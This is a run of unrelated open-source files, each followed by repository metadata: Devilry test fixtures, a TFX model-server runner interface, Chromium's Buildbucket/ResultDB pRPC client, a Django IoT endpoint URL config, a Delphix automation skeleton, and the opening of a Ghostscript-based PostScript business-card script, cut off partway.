    # NOTE(review): a1.g1 gets two deliveries and a1.g2/a2.g1 get none; the
    # second delivery (and the a2.g2 pair below) was presumably meant for
    # the sibling group -- confirm before changing.
    self.add_delivery('cs110.fall11.a1.g1', goodFile)
    self.add_delivery('cs110.fall11.a1.g1', goodFile)
    self.add_delivery('cs110.fall11.a2.g2', badFile)
    self.add_delivery('cs110.fall11.a2.g2', okFile)
    # cs111
    self.add_delivery('cs111.fall11.week1.g1', goodFile)
    self.add_delivery('cs111.fall11.week1.g2', goodFile)
    self.add_delivery('cs111.fall11.week1.g3', badFile)
    self.add_delivery('cs111.fall11.week1.g4', okFile)
    # g3's delivery fails here
    self.add_delivery('cs111.fall11.week2.g1', goodFile)
    self.add_delivery('cs111.fall11.week2.g2', goodFile)
    self.add_delivery('cs111.fall11.week2.g3', badFile)
    self.add_delivery('cs111.fall11.week2.g4', okFile)
    # g4's delivery fails here
    self.add_delivery('cs111.fall11.week3.g1', goodFile)
    self.add_delivery('cs111.fall11.week3.g2', goodFile)
    self.add_delivery('cs111.fall11.week3.g4', okFile)
    # g4 fails
    self.add_delivery('cs111.fall11.week4.g1', goodFile)
    self.add_delivery('cs111.fall11.week4.g2', goodFile)
    # feedbacks
    # an empty verdict defaults to max score
    goodVerdict = None
    okVerdict = {'grade': 'C', 'points': 85, 'is_passing_grade': True}
    badVerdict = {'grade': 'E', 'points': 60, 'is_passing_grade': True}
    failVerdict = {'grade': 'F', 'points': 30, 'is_passing_grade': False}
    self.add_feedback('cs101.fall11.a1.g1', verdict=goodVerdict)
    self.add_feedback('cs101.fall11.a1.g2', verdict=goodVerdict)
    self.add_feedback('cs101.fall11.a1.g3', verdict=badVerdict)
    self.add_feedback('cs101.fall11.a1.g4', verdict=okVerdict)
    self.add_feedback('cs101.fall11.a2.g1', verdict=goodVerdict)
    self.add_feedback('cs101.fall11.a2.g2', verdict=goodVerdict)
    self.add_feedback('cs101.fall11.a2.g3', verdict=badVerdict)
    self.add_feedback('cs101.fall11.a2.g4', verdict=okVerdict)
    # cs110
    # NOTE(review): a1.g1 receives two feedbacks (good then bad); mirrors
    # the duplicated deliveries above -- confirm intent.
    self.add_feedback('cs110.fall11.a1.g1', verdict=goodVerdict)
    self.add_feedback('cs110.fall11.a1.g1', verdict=badVerdict)
    self.add_feedback('cs110.fall11.a2.g2', verdict=goodVerdict)
    self.add_feedback('cs110.fall11.a2.g2', verdict=okVerdict)
    # cs111
    self.add_feedback('cs111.fall11.week1.g1', verdict=goodVerdict)
    self.add_feedback('cs111.fall11.week1.g2', verdict=goodVerdict)
    self.add_feedback('cs111.fall11.week1.g3', verdict=badVerdict)
    self.add_feedback('cs111.fall11.week1.g4', verdict=okVerdict)
    # g3's feedback fails here
    self.add_feedback('cs111.fall11.week2.g1', verdict=goodVerdict)
    self.add_feedback('cs111.fall11.week2.g2', verdict=goodVerdict)
    self.add_feedback('cs111.fall11.week2.g3', verdict=failVerdict)
    self.add_feedback('cs111.fall11.week2.g4', verdict=okVerdict)
    # g4's feedback fails here
    self.add_feedback('cs111.fall11.week3.g1', verdict=goodVerdict)
    self.add_feedback('cs111.fall11.week3.g2', verdict=goodVerdict)
    self.add_feedback('cs111.fall11.week3.g4', verdict=failVerdict)
    # g4 fails
    self.add_feedback('cs111.fall11.week4.g1', verdict=goodVerdict)
    self.add_feedback('cs111.fall11.week4.g2', verdict=goodVerdict)
| {
"content_hash": "1e0bf0b1071e5bafafae429f01b8210a",
"timestamp": "",
"source": "github",
"line_count": 797,
"max_line_length": 125,
"avg_line_length": 40.10288582183187,
"alnum_prop": 0.5913272010512484,
"repo_name": "vegarang/devilry-django",
"id": "f663407636ad79968c015e49069f32c1f3d420be",
"size": "31962",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "devilry/apps/core/testhelper.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "697906"
},
{
"name": "Python",
"bytes": "931589"
}
],
"symlink_target": ""
} |
"""Module for shared interface of every model server runners."""
import abc
from typing import Optional
class BaseModelServerRunner(abc.ABC):
    """Shared interface of all model server runners.

    Model server runner is responsible for managing the model server job and
    relevant resources in the serving platform. For example, model server runner
    for kubernetes will launch a Pod of model server with required resources
    allocated, and tear down all the kubernetes resources once infra validation
    is done. Note that model server runner does *not* interact with model server
    app.

    Model server job has 5 states: Initial, Scheduled, Running, Aborted, and
    End. Each state transition is depicted in the diagram below.

    ```
           +-----------+
           |  Initial  |
           +-----+-----+
                 | Start()
           +-----v-----+
        +--+ Scheduled |
        |  +-----+-----+
        |        | WaitUntilRunning()
        |  +-----v-----+
        +--+  Running  |
        |  +-----+-----+
        |        |
  +-----v-----+  |
  |  Aborted  +--+ Stop()
  +-----------+  |
                 |
           +-----v-----+
           |    End    |
           +-----------+
    ```

    At any step, the job can be aborted in the serving platform. Model server
    runner will NOT recover a job from failure (even if it can) and regard the
    abortion as a validation failure.

    All the infra validation logic (waiting for model loaded, sending requests,
    measuring metrics, etc.) will happen when model server job has reached
    Running state. This is not a scope of model server runner work.

    Depending on the serving platform, some of the states might be the same. For
    example, in a GCP cloud AI prediction service we have a global model server
    instance running, which makes Scheduled state and Running state
    indistinguishable. In such case, `WaitUntilRunning()` action will be a
    no-op.
    """

    @abc.abstractmethod
    def __repr__(self) -> str:
        pass

    @abc.abstractmethod
    def GetEndpoint(self) -> str:
        """Get an endpoint to the model server to connect to.

        Endpoint will be available after the model server job has reached the
        Running state.

        Returns:
            The endpoint string of the running model server.

        Raises:
            AssertionError: if runner hasn't reached the Running state.
        """

    @abc.abstractmethod
    def Start(self) -> None:
        """Start the model server in non-blocking manner.

        `Start()` will transition the job state from Initial to Scheduled.
        Serving platform will turn the job into Running state in the future.

        In `Start()`, model server runner should prepare the resources model
        server requires including config files, environment variables, volumes,
        proper authentication, computing resource allocation, etc.. Cleanup for
        the resources does not happen automatically, and you should call
        `Stop()` to do that if you have ever called `Start()`.

        It is not allowed to run `Start()` twice. If you need to restart the
        job, you should create another model server runner instance.
        """

    @abc.abstractmethod
    def WaitUntilRunning(self, deadline: float) -> None:
        """Wait until model server job is running.

        When this method is returned without error, the model server job is in
        the Running state where you can perform all the infra validation logic.
        It does not guarantee that model server job would remain in the Running
        state forever, (e.g. preemption could happen in some serving platform)
        and any kind of infra validation logic failure can be caused from model
        server job not being in the Running state. Still, it is a validation
        failure and we blame model for this.

        Args:
            deadline: A deadline time in UTC timestamp (in seconds).

        Raises:
            Implementation-defined error when the job did not reach the
            Running state before the deadline. (The previous docstring
            claimed a boolean return, but the signature returns None.)
        """

    @abc.abstractmethod
    def Stop(self) -> None:
        """Stop the model server in blocking manner.

        Model server job would be gracefully stopped once infra validation
        logic is done. Here is the place you need to cleanup every resources
        you've created in the `Start()`. It is recommended not to raise error
        during the `Stop()` as it will usually be called in the `finally`
        block.

        `Stop()` is guaranteed to be called if `Start()` is ever called, unless
        the process dies unexpectedly due to external factors (e.g. SIGKILL).
        `Stop()` can be called even when `Start()` was not completed. `Stop()`
        should not assume the completion of `Start()`.

        `Stop()` is also called when graceful shutdown for the *executor* (not
        model server) is requested. `Stop()` method should be finished within
        the graceful shutdown period, and it is perfectly fine to add a retry
        logic inside `Stop()` until the deadline is met.
        """

    @abc.abstractmethod
    def GetLogs(self) -> Optional[str]:
        """Get a model server log for debugging, or None if unavailable."""
| {
"content_hash": "9bc392ea79c4109bbb65dc919e72abae",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 80,
"avg_line_length": 38.234375,
"alnum_prop": 0.6653044544340008,
"repo_name": "tensorflow/tfx",
"id": "ea5ed1aefbc0e1a491bcdf5c7e78f999a4375dbf",
"size": "5490",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tfx/components/infra_validator/model_server_runners/base_runner.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "7405"
},
{
"name": "Jupyter Notebook",
"bytes": "38579"
},
{
"name": "Python",
"bytes": "6009050"
},
{
"name": "Shell",
"bytes": "34056"
},
{
"name": "Starlark",
"bytes": "20324"
}
],
"symlink_target": ""
} |
import logging
import json
from typing import NamedTuple, Optional
from urllib.parse import urlunsplit
import six
from blinkpy.common.memoized import memoized
from blinkpy.common.net.luci_auth import LuciAuth
_log = logging.getLogger(__name__)
# These characters always appear at the beginning of the RPC response.
RESPONSE_PREFIX = b")]}'"
class Build(NamedTuple):
    """A combination of builder and build number.

    If the build number is absent, this represents the latest build for a given
    builder.
    """
    # Builder name within the bucket.
    builder_name: str
    # Build number within the builder; None means "latest build".
    build_number: Optional[int] = None
    # Buildbucket build ID, if known (coerced with str() when used).
    build_id: Optional[str] = None
class RPCError(Exception):
    """Base type for all pRPC errors.

    The formatted message is '<method>: <message>', with ' (code: <n>)'
    appended when a non-zero gRPC status code is supplied.
    """

    def __init__(self, message, method, request_body=None, code=None):
        full_message = f'{method}: {message}'
        if code:
            full_message += f' (code: {code:d})'
        super().__init__(full_message)
        self.method = method
        self.code = code
        self.request_body = request_body
class BaseRPC:
    """pRPC client.

    A pRPC server handles HTTP POST requests at:
        /prpc/<service>/<method>

    See Also:
        go/prpc: Describes the provisional RPC protocol.
    """

    def __init__(self, web, luci_auth, hostname, service):
        # `web` provides request(method, url, data=..., headers=...);
        # `luci_auth` provides get_access_token().
        self._web = web
        self._luci_auth = luci_auth
        self._hostname = hostname
        self._service = service

    @classmethod
    def from_host(cls, host, *args, **kwargs):
        """Alternate constructor: build the client from a blinkpy host."""
        return cls(host.web, LuciAuth(host), *args, **kwargs)

    @memoized
    def _make_url(self, method):
        # Memoized: the URL for a given method never changes for this client.
        return urlunsplit((
            'https',
            self._hostname,
            '/prpc/%s/%s' % (self._service, method),
            '',  # No query params
            '',  # No fragment
        ))

    def _luci_rpc(self, method, data):
        """Fetches json data through Luci RPCs.

        Args:
            method: Method for the RPC call.
            data: The request body as a JSON-serializable object.

        Returns:
            On success (HTTP 200): the parsed JSON response.
            Otherwise: None (the failure is logged).
        """
        luci_token = self._luci_auth.get_access_token()
        headers = {
            'Authorization': 'Bearer ' + luci_token,
            'Accept': 'application/json',
            'Content-Type': 'application/json',
        }
        url = self._make_url(method)
        body = six.ensure_binary(json.dumps(data, separators=(',', ':')))
        response = self._web.request('POST', url, data=body, headers=headers)
        if response.getcode() == 200:
            response_body = response.read()
            # The server prepends ")]}'" (RESPONSE_PREFIX); strip it before
            # decoding the JSON payload.
            if response_body.startswith(RESPONSE_PREFIX):
                response_body = response_body[len(RESPONSE_PREFIX):]
            return json.loads(response_body)
        _log.error("RPC request failed. Status=%s, url=%s", response.status,
                   url)
        _log.debug("Full RPC response: %s" % str(response))
        return None

    def _luci_rpc_paginated(self,
                            method,
                            data,
                            field,
                            page_size=None,
                            count=1000):
        """Retrieve entities from a pRPC method with paginated results.

        Some methods receive a request like:
            {..., "pageSize": ..., "pageToken": ...}
        and reply with a payload like:
            {<repeated field>: [<entity1>, ...], "nextPageToken": ...}

        This method automatically makes a sequence of requests to gather the
        requested number of entities. Generally, the method parameters should
        not change between requests except for the "pageToken" field.

        NOTE: the caller's `data` dict is mutated in place ("pageSize" and
        "pageToken" keys are added).

        Arguments:
            method: The RPC method name (conventionally Pascal case).
            data: JSON-encodable parameters to send to the RPC endpoint.
            field: Name of the repeated field that should be extracted from
                each response body.
            page_size: Number of entities to retrieve per request. The server
                may return fewer if the page size is larger than the maximum
                supported (typically 1000). Defaults to `count` to try to get
                all the data in one request.
            count: Total number of entities to attempt to retrieve. The actual
                number returned may be fewer, depending on how many entities
                exist.

        Returns:
            A list of up to `count` entities. The shape of each entry depends
            on the method.

        See Also:
            https://source.chromium.org/chromium/infra/infra/+/master:go/src/go.chromium.org/luci/buildbucket/proto/builds_service.proto
            https://source.chromium.org/chromium/infra/infra/+/master:go/src/go.chromium.org/luci/resultdb/proto/v1/resultdb.proto
        """
        entities = []
        data['pageSize'] = page_size or count
        # On the first iteration 'pageToken' is absent, so get() returns the
        # truthy default and the loop runs; afterwards an empty/absent
        # nextPageToken terminates it.
        while data.get('pageToken', True) and count - len(entities) > 0:
            response = self._luci_rpc(method, data)
            if not isinstance(response, dict):
                # RPC failure (None) or malformed payload: stop early.
                break
            entities.extend(response.get(field) or [])
            data['pageToken'] = response.get('nextPageToken')
        return entities[:count]
class BuildbucketClient(BaseRPC):
    """Client for the Buildbucket v2 `Builds` pRPC service.

    Supports direct GetBuild/SearchBuilds calls, and batching several
    requests into a single `Batch` RPC via `add_*_req` + `execute_batch`.
    """

    def __init__(self,
                 web,
                 luci_auth,
                 hostname='cr-buildbucket.appspot.com',
                 service='buildbucket.v2.Builds'):
        super().__init__(web, luci_auth, hostname, service)
        # Buffered (method, request_body, repeated_field, count) tuples for
        # the next `Batch` call; see add_get_build_req/add_search_builds_req.
        self._batch_requests = []

    def _make_get_build_body(self, build=None, bucket='try',
                             build_fields=None):
        # NOTE(review): despite the `build=None` default, a Build instance is
        # effectively required -- `build.build_id` below raises
        # AttributeError on None. Confirm before relying on the default.
        request = {}
        if build.build_id:
            request['id'] = str(build.build_id)
        if build.builder_name:
            request['builder'] = {
                'project': 'chromium',
                'bucket': bucket,
                'builder': build.builder_name
            }
        if build.build_number:
            request['buildNumber'] = build.build_number
        if build_fields:
            # The `builds.*` prefix is not needed for retrieving an individual
            # build.
            request['fields'] = ','.join(build_fields)
        return request

    def _make_search_builds_body(self, predicate, build_fields=None):
        request = {'predicate': predicate}
        if build_fields:
            # Unlike GetBuild, the repeated `builds` field requires the
            # `builds.*` prefix on each requested sub-field.
            request['fields'] = ','.join('builds.*.%s' % field
                                         for field in build_fields)
        return request

    def get_build(self, build=None, bucket='try', build_fields=None):
        """Fetch a single build (by ID or builder+number); see GetBuild."""
        return self._luci_rpc(
            'GetBuild', self._make_get_build_body(build, bucket, build_fields))

    def search_builds(self,
                      predicate,
                      build_fields=None,
                      page_size=None,
                      count=1000):
        """Fetch up to `count` builds matching `predicate` (paginated)."""
        return self._luci_rpc_paginated('SearchBuilds',
                                        self._make_search_builds_body(
                                            predicate, build_fields),
                                        'builds',
                                        page_size=page_size,
                                        count=count)

    def add_get_build_req(self, build=None, bucket='try', build_fields=None):
        """Queue a GetBuild request for the next execute_batch() call."""
        self._batch_requests.append(
            ('getBuild', self._make_get_build_body(build, bucket,
                                                   build_fields), None, None))

    def add_search_builds_req(self, predicate, build_fields=None, count=1000):
        """Queue a SearchBuilds request for the next execute_batch() call."""
        # No `page_size` argument, since it does not make sense to unpaginate
        # data in a batch request. Just try to extract the repeated field and
        # truncate it to `count` items, at most.
        self._batch_requests.append(
            ('searchBuilds',
             self._make_search_builds_body(predicate,
                                           build_fields), 'builds', count))

    def execute_batch(self):
        """Execute the current batch request and yield the results.

        Once called, the client will clear its internal request buffer.

        Yields:
            For each queued getBuild: the build object. For each queued
            searchBuilds: each build in the repeated `builds` field, up
            to that request's `count`.

        Raises:
            RPCError: If the server returns an error object for any individual
                response.
        """
        if not self._batch_requests:
            return
        # Swap out the buffer first so a failure cannot leave stale requests.
        batch_requests, self._batch_requests = self._batch_requests, []
        batch_request_body = {
            'requests': [{
                method: body
            } for method, body, _, _ in batch_requests]
        }
        batch_response = self._luci_rpc('Batch', batch_request_body) or {}
        responses = batch_response.get('responses') or []
        for request, response_body in zip(batch_requests, responses):
            method, request_body, field, count = request
            error = response_body.get('error')
            if error:
                message = error.get('message', 'unknown error')
                # Avoid the built-in `str.capitalize`, since it lowercases the
                # remaining letters.
                raise RPCError(message, method[0].upper() + method[1:],
                               request_body, error.get('code'))
            unwrapped_response = response_body[method]
            if field:
                yield from unwrapped_response[field][:count]
            else:
                yield unwrapped_response

    def clear_batch(self):
        """Clear the current batch request."""
        self._batch_requests.clear()
class ResultDBClient(BaseRPC):
    """Client for the LUCI ResultDB pRPC service."""

    def __init__(self,
                 web,
                 luci_auth,
                 hostname='results.api.cr.dev',
                 service='luci.resultdb.v1.ResultDB'):
        super().__init__(web, luci_auth, hostname, service)

    def _get_invocations(self, build_ids):
        """Map buildbucket build IDs to ResultDB invocation names."""
        return ['invocations/build-%s' % build for build in build_ids]

    def query_artifacts(self, build_ids, predicate, page_size=None,
                        count=1000):
        """Fetch up to `count` artifacts for the given builds (paginated)."""
        body = {
            'invocations': self._get_invocations(build_ids),
            'predicate': predicate,
        }
        return self._luci_rpc_paginated('QueryArtifacts',
                                        body,
                                        'artifacts',
                                        page_size=page_size,
                                        count=count)
| {
"content_hash": "f63c3272cb5df9f21e68628c8fce5de6",
"timestamp": "",
"source": "github",
"line_count": 277,
"max_line_length": 136,
"avg_line_length": 37.70397111913358,
"alnum_prop": 0.5465338950593642,
"repo_name": "nwjs/chromium.src",
"id": "421672bddb1cc1c2638ac95f40d8bdcf6df7c67f",
"size": "11974",
"binary": false,
"copies": "1",
"ref": "refs/heads/nw70",
"path": "third_party/blink/tools/blinkpy/common/net/rpc.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
import os

from django.conf.urls import url

from . import views
from . import plugins
from .utils import plugin_urlpatterns

# Fallback value used when the secret endpoint paths are not configured.
DUMMY_OBSCURE_URL = 'this_should_be_in_env_var'
OBSCURE_URL = os.environ.get('OBSCURE_URL', DUMMY_OBSCURE_URL)
DIGITA_URL = os.environ.get('DIGITA_URL', DUMMY_OBSCURE_URL)
SENTILO_URL = os.environ.get('SENTILO_URL', DUMMY_OBSCURE_URL)
if DUMMY_OBSCURE_URL == OBSCURE_URL:
    print("Warning: you should set OBSCURE_URL environment variable in this env\n\n")
# Reuse the value read above instead of re-reading the environment
# (the old os.environ.get('OBSCURE_URL', OBSCURE_URL) was a no-op wrapper).
OBSCURE_URL_PATTERN = r'^{}(.*)$'.format(OBSCURE_URL)
# NOTE(review): when DIGITA_URL is unset this falls back to OBSCURE_URL, not
# to the DIGITA_URL constant computed above — that looks like a copy-paste
# slip, but the original behavior is preserved here pending confirmation.
DIGITA_URL_PATTERN = r'^{}$'.format(os.environ.get('DIGITA_URL', OBSCURE_URL))
# Load urlpatterns from plugins directory
urlpatterns = plugin_urlpatterns(plugins)
urlpatterns += [
    url(r'^$', views.index, name='index'),
    url(OBSCURE_URL_PATTERN, views.obscure_dump_request_endpoint, name='dump_request'),
    url(DIGITA_URL_PATTERN, views.digita_dump_request_endpoint, name='digita_dump_request'),
    url(r'^basicauth$', views.basicauth_dump_request_endpoint, name='basicauth_dump_request'),
    url(r'^aqtest$', views.basicauth_dump_request_endpoint, name='aqtest'),
    url(r'^fmiaq/v1$', views.fmiaqhandler, name='fmiaqhandler'),
    url(r'^noisesensor/v1$', views.noisesensorhandler, name='noisesensorhandler'),
    url(r'^mapmytracks/v1$', views.mapmytracks, name='mapmytracks'),
]
| {
"content_hash": "3789e90213dec605cc0a9f48933d10ed",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 94,
"avg_line_length": 44.064516129032256,
"alnum_prop": 0.7254758418740849,
"repo_name": "aapris/IoT-Web-Experiments",
"id": "71b54707c497f3455b259a5cc70fa4ec67b9501d",
"size": "1366",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "iotendpoints/endpoints/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "101467"
}
],
"symlink_target": ""
} |
"""Description
Usage:
dx_skel.py ()
[--engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_skel.py -h | --help | -v | --version
Description
Examples:
Options:
--engine <type> Alt Identifier of Delphix engine in dxtools.conf.
--all Run against all engines.
--debug Enable debug logging
--parallel <n> Limit number of jobs to maxjob
--poll <n> The number of seconds to wait between job polls
[default: 10]
--config <path_to_file> The path to the dxtools.conf file
[default: ./dxtools.conf]
--logdir <path_to_file> The path to the logfile you want to use.
[default: ./dx_operations_vdb.log]
-h --help Show this screen.
-v --version Show version.
"""
VERSION = 'v.0.0.000'
import sys
from os.path import basename
from time import sleep, time
from docopt import docopt
from delphixpy.exceptions import HttpError
from delphixpy.exceptions import JobError
from delphixpy.exceptions import RequestError
from delphixpy.web import job
from lib.DlpxException import DlpxException
from lib.DxLogging import logging_est
from lib.DxLogging import print_debug
from lib.DxLogging import print_info
from lib.DxLogging import print_exception
from lib.GetReferences import find_obj_by_name
from lib.GetSession import GetSession
def run_async(func):
    """Decorator that makes the wrapped function run in a background thread.

    Calling the decorated function starts a new ``threading.Thread`` that
    executes ``func`` with the given positional and keyword arguments, and
    returns the already-started Thread object so callers may ``join()`` it:

        @run_async
        def task():
            do_something

        t = task()
        t.join()

    Recipe: http://code.activestate.com/recipes/576684-simple-threading-decorator/
    """
    from threading import Thread
    from functools import wraps

    @wraps(func)
    def _threaded(*args, **kwargs):
        worker = Thread(target=func, args=args, kwargs=kwargs)
        worker.start()
        return worker

    return _threaded
@run_async
def main_workflow(engine):
    """
    This function actually runs the jobs.
    Use the @run_async decorator to run this function asynchronously.
    This allows us to run against multiple Delphix Engine simultaneously
    engine: Dictionary of engines
    """
    try:
        #Setup the connection to the Delphix Engine
        dx_session_obj.serversess(engine['ip_address'], engine['username'],
                                  engine['password'])
        if arguments['--vdb']:
            #Get the database reference we are copying from the database name
            # NOTE(review): `database` here is not defined in this file —
            # presumably supplied by the concrete script built from this
            # skeleton; confirm before use.
            database_obj = find_obj_by_name(dx_session_obj.server_session,
                                            database, arguments['--vdb'])
    except DlpxException as e:
        print_exception('\nERROR: Engine {} encountered an error while'
                        '{}:\n{}\n'.format(engine['hostname'],
                        arguments['--target'], e))
        sys.exit(1)
    thingstodo = ["thingtodo"]
    try:
        with dx_session_obj.job_mode(single_thread):
            # Loop until both the work list and the engine's job list drain.
            while (len(dx_session_obj.jobs) > 0 or len(thingstodo)> 0):
                if len(thingstodo) > 0:
                    # NOTE(review): OPERATION and method_call are skeleton
                    # placeholders, undefined in this file; a concrete script
                    # must replace them or this branch raises NameError.
                    if OPERATION:
                        method_call
                    elif OPERATION:
                        method_call
                    thingstodo.pop()
                # get all the jobs, then inspect them
                i = 0
                for j in dx_session_obj.jobs.keys():
                    job_obj = job.get(dx_session_obj.server_session,
                                      dx_session_obj.jobs[j])
                    print_debug(job_obj)
                    print_info('{}: Replication operations: {}'.format(
                        engine['hostname'], job_obj.job_state))
                    if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
                        # If the job is in a non-running state, remove it
                        # from the
                        # running jobs list.
                        del dx_session_obj.jobs[j]
                    elif job_obj.job_state in 'RUNNING':
                        # If the job is in a running state, increment the
                        # running job count.
                        # NOTE(review): `in 'RUNNING'` is a substring test,
                        # not an equality test — it also matches e.g. 'RUN'.
                        i += 1
                    print_info('{}: {:d} jobs running.'.format(
                        engine['hostname'], i))
                # If we have running jobs, pause before repeating the
                # checks.
                if len(dx_session_obj.jobs) > 0:
                    sleep(float(arguments['--poll']))
    except (HttpError, RequestError, JobError, DlpxException) as e:
        print_exception('ERROR: Could not complete replication '
                        'operation:{}'.format(e))
def run_job():
    """
    Run main_workflow asynchronously against all of the specified engines.

    Reads the module globals ``arguments``, ``dx_session_obj`` and
    ``config_file_path`` that main() populates.
    """
    # Create an empty list to store threads we create.
    threads = []
    engine = None
    # If the --all argument was given, run against every engine in dxtools.conf
    if arguments['--all']:
        print_info("Executing against all Delphix Engines in the dxtools.conf")
        try:
            # For each server in the dxtools.conf...
            for delphix_engine in dx_session_obj.dlpx_engines:
                # BUG FIX: previously indexed the session object itself
                # (dx_session_obj[delphix_engine]); the engine dictionaries
                # live in dx_session_obj.dlpx_engines, as used below.
                engine = dx_session_obj.dlpx_engines[delphix_engine]
                # Create a new thread and add it to the list.
                threads.append(main_workflow(engine))
        except DlpxException as e:
            # BUG FIX: replaced a Python 2 ``print`` statement with
            # print_exception, matching the script's other error paths.
            print_exception('Error encountered in run_job():\n{}'.format(e))
            sys.exit(1)
    elif arguments['--all'] is False:
        # Else if the --engine argument was given, test to see if the engine
        # exists in dxtools.conf
        if arguments['--engine']:
            try:
                engine = dx_session_obj.dlpx_engines[arguments['--engine']]
                print_info('Executing against Delphix Engine: {}\n'.format(
                    (arguments['--engine'])))
            except (DlpxException, RequestError, KeyError):
                raise DlpxException('\nERROR: Delphix Engine {} cannot be '
                                    'found in {}. Please check your value '
                                    'and try again. Exiting.\n'.format(
                                        arguments['--engine'], config_file_path))
        else:
            # Else search for a default engine in the dxtools.conf
            for delphix_engine in dx_session_obj.dlpx_engines:
                if dx_session_obj.dlpx_engines[delphix_engine]['default'] == \
                        'true':
                    engine = dx_session_obj.dlpx_engines[delphix_engine]
                    print_info('Executing against the default Delphix Engine '
                               'in the dxtools.conf: {}'.format(
                                   dx_session_obj.dlpx_engines[delphix_engine]['hostname']))
                    break
            # Prefer identity comparison with None (was ``engine == None``).
            if engine is None:
                raise DlpxException("\nERROR: No default engine found. Exiting")
        # run the job against the engine
        threads.append(main_workflow(engine))
    # For each thread in the list...
    for each in threads:
        # join them back together so that we wait for all threads to complete
        # before moving on
        each.join()
def time_elapsed():
    """Return minutes elapsed since the module-global ``time_start``,
    rounded to one decimal place. Useful for progress reporting."""
    minutes = (time() - time_start) / 60
    return round(minutes, 1)
def main(arguments):
    """Script entry point: set up globals, connect, and run the workflow.

    arguments: dictionary of command-line options parsed by docopt.
    """
    # We want to be able to call on these variables anywhere in the script.
    global single_thread
    global usebackup
    global time_start
    global config_file_path
    global dx_session_obj
    global debug
    if arguments['--debug']:
        debug = True
    try:
        dx_session_obj = GetSession()
        logging_est(arguments['--logdir'])
        print_debug(arguments)
        time_start = time()
        single_thread = False
        config_file_path = arguments['--config']
        # Parse the dxtools.conf and put it into a dictionary
        dx_session_obj.get_config(config_file_path)
        # This is the function that will handle processing main_workflow for
        # all the servers.
        run_job()
        elapsed_minutes = time_elapsed()
        # BUG FIX: time_elapsed() returns a float, so the old '{:d}' spec
        # raised ValueError here; use '{:.2f}' like the handlers below.
        print_info('script took {:.2f} minutes to get this far.'.format(
            elapsed_minutes))
    # Here we handle what we do when the unexpected happens
    except SystemExit as e:
        # Propagate sys.exit(#) calls unchanged.
        sys.exit(e)
    except HttpError as e:
        # The connection to the Delphix Engine failed.
        # NOTE(review): the message below is missing a separator between
        # 'Engine' and 'Please' — left as-is to preserve the exact string.
        print_exception('Connection failed to the Delphix Engine'
                        'Please check the ERROR message:\n{}'.format(e))
        sys.exit(1)
    except JobError as e:
        # A job failed in Delphix; report actionable data before exiting.
        elapsed_minutes = time_elapsed()
        print_exception('A job failed in the Delphix Engine')
        print_info('{} took {:.2f} minutes to get this far\n{}'.format(
            basename(__file__), elapsed_minutes, e))
        sys.exit(3)
    except KeyboardInterrupt:
        # Gracefully handle ctrl+c exits.
        print_debug("You sent a CTRL+C to interrupt the process")
        elapsed_minutes = time_elapsed()
        print_info('{} took {:.2f} minutes to get this far\n'.format(
            basename(__file__), elapsed_minutes))
    except:
        # Deliberately broad catch-all: log whatever happened and exit.
        print_exception(sys.exc_info()[0])
        elapsed_minutes = time_elapsed()
        # BUG FIX: the old spec '{.2f}' (missing colon) raised an error
        # inside this handler; '{:.2f}' is what was intended.
        print_info('{} took {:.2f} minutes to get this far\n'.format(
            basename(__file__), elapsed_minutes))
        sys.exit(1)
if __name__ == "__main__":
    # Grab our arguments from the docopt usage string at the top of the script.
    arguments = docopt(__doc__, version=basename(__file__) + " " + VERSION)
    # Feed our arguments to the main function, and off we go!
    main(arguments)
| {
"content_hash": "74740273c9e82c0d931a48cea43c4461",
"timestamp": "",
"source": "github",
"line_count": 300,
"max_line_length": 80,
"avg_line_length": 35.79333333333334,
"alnum_prop": 0.5569938536040231,
"repo_name": "mcbrune/delphixpy-automation",
"id": "521605296919413b77281370218baa95a278fdba",
"size": "11171",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "v1_8_0/dx_database.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "955569"
}
],
"symlink_target": ""
} |
"""
recipe_custom_ps.py
Template with sample code creating for custom Postscript PS files.
Sample code is a business card based on Levenger's personalized
3x5 card.
Ghostscript provides easiest way to view PS output, but not essential.
Utilities included.
Download Ghostscript:
http://www.ghostscript.com/download/gsdnld.html
"""
__author__ = "Jack Trainor"
__date__ = "2015-12-09"
import sys
import os.path
import subprocess
######################################################################
"""
String constants for business index card.
"""
NAME = "John Doe"
ADDRESS = "123 Main Street"
CITY = "Anytown, USA 01234"
EMAIL = "johndoe123@gmail.com"
PHONE = "1.555.123.4567"
FAX = "1.555.123.4568"
CELL = "1.555.123.4569"
PHONE_FIELD = "Phone"
FAX_FIELD = "Fax"
CELL_FIELD = "Cell"
######################################################################
"""
Auxiliary utilities.
*** REPLACE WITH VALID PATHS ON YOUR MACHINE. ***
"""
PDF_VIEWER = r"C:\Program Files\Foxit Software\Foxit Reader\FoxitReader.exe"
GSC = r"C:\Program Files\gs\gs9.16\bin\gswin32c.exe"
def pdfview(path):
    """Open *path* in the configured PDF viewer, if it is installed."""
    if not os.path.exists(PDF_VIEWER):
        println("%s not installed." % PDF_VIEWER)
        return
    subprocess.call([PDF_VIEWER, path])

def gs_ps2pdf(input_ps, output_pdf):
    """Use Ghostscript to convert a PS file to a PDF file."""
    if not os.path.exists(GSC):
        println("%s not installed." % GSC)
        return
    println("gs_ps2pdf: %s -> %s" % (input_ps, output_pdf))
    args = [
        GSC,
        "-o", output_pdf,
        "-sDEVICE=pdfwrite",
        "-dPDFSETTINGS=/prepress",
        "-dEmbedAllFonts=true",
        "-dSubsetFonts=false",
        # "-sFONTPATH=%s" % CUSTOM_FONTS  # for custom fonts if any
        "-dBATCH",
        "-dQUIET",
        "-c", ".setpdfwrite <</NeverEmbed [ ]>> setdistillerparams",
        "-f",
